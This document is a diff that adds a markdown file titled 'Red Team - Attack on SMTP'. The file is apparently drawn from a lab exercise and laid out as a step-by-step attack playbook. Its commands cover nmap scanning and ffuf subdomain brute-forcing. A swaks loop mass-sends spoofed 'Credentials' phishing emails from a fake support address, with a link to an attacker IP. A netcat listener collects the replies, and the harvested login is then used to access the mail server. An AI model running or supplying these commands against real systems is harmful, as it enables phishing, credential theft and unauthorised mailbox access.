Create Red Team - SMTP.md

Red Team - SMTP.md

@@ -0,0 +1,122 @@
+# Red Team - Attack on SMTP
+
+1. Information Gathering | `Techniques: Nmap Scanning`
+```bash
+nmap -sV -sC -v -p- --min-rate=10000 <Target IP>
+```
+
+2. Subdomain Enumeration | `Techniques: Using ffuf for subdomain Brute-Forcing`
+```bash
+ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u https://TargetDomain.com -H "Host: FUZZ.TargetDomain.com"
+```
+
+3. Email Collection | `Techniques: Extracting Email from Web Page`
+```bash
+#Manually visit Target Domain / SubDomain and extract emails to mails.txt 
+```
+
+4. Email Engagement | `Techniques: Sending Emails with swaks`
+```bash
+while read mail; do swaks --to $mail --from support@TargetDomain.com --header "Subject: Credentials" --body "goto http://10.10.14.4" --server 10.10.10.197; done < mails.txt
+```
+
+5. Credential Harvesting | `Techniques: Netcat Listener`
+```bash
+nc -lvp 80 # to listen for incoming connections
+```
+
+6. Accessing SMTP | `Techniques: Using evolution to Access SMTP`
+```bash
+apt install evolution
+#and with Configure SMTP server 10.10.10.197 and email user@TargetDomain.com
+```
+
+7. Exploring Sent Items | `Techniques: Checking Sent Emails`
+```bash
+#Check sent items for any useful information afther accessing the SMTP server
+```
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+